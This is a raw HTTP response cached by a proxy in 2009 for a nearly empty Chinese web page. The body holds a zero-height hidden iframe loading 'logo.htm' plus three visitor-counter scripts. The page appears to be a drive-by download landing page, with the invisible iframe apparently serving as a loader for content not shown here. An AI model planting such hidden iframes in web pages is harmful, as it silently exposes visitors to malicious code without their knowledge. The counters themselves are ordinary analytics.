HTTP/1.1 200 OK
Content-Length: 399
ETag: "8e59924d6c97c91:270"
Date: Thu, 26 Feb 2009 06:07:09 GMT
Last-Modified: Wed, 25 Feb 2009 17:12:57 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://w.d75d.cn/01/index.htm
X-Polipo-Date: Thu, 26 Feb 2009 06:14:49 GMT
X-Polipo-Access: Thu, 26 Feb 2009 06:14:50 GMT

 <br>
<br>
<br>
<iframe src=logo.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/959923/ystat.js"></script>

<script src='http://w.cnzz.com/c.php?id=30013698&l=2' language='JavaScript' charset='gb2312'></script>

<script language="javascript" src="http://count16.51yes.com/click.aspx?id=166677334&logo=1"></script>
